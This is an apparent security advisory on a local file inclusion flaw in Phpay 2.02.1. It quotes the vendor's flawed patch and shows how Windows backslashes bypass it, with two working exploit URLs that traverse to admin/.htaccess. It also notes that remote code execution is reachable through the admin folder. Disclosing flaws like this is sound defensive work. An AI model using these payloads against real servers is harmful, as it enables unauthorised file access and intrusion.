|
By Michael Brooks=0D
=0D
Vulnerability Type:Local File Inclusion=0D
=0D
Software: Phpay=0D
=0D
Homepage:http://sourceforge.net/projects/phpay/=0D
=0D
Version Affected:2.02.1=0D
=0D
=0D
=0D
Phpay has been affected by multiple local file include flaws, as a result this patch was written:=0D
=0D
$config = ereg_replace(":","", $config);=0D
=0D
$config = trim(ereg_replace("../","", $config));=0D
=0D
$config = trim(ereg_replace("/","", $config));=0D
=0D
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "\n";}=0D
=0D
if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}=0D
=0D
require("./$config");=0D
=0D
=0D
=0D
To bypass this patch backslashes can be used instead of forward slashes on windows systems. =0D
=0D
Also .inc.php must exists *somewhere* in the string.=0D
=0D
Local File Include for windows only:=0D
=0D
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess=0D
=0D
or if magic_quotes_gpc is turned on:=0D
=0D
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess=0D
=0D
=0D
=0D
Remote code execution is accessible in the ./admin/ folder. =0D
=0D
The admin folder *should* be protected by a .htaccess file similar to osCommerce2. =0D
=0D
=0D
=0D
Vulnerable configuration:=0D
=0D
A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue. =0D
=0D
=0D
=0D
=0D
=0D
Merry Christmas=0D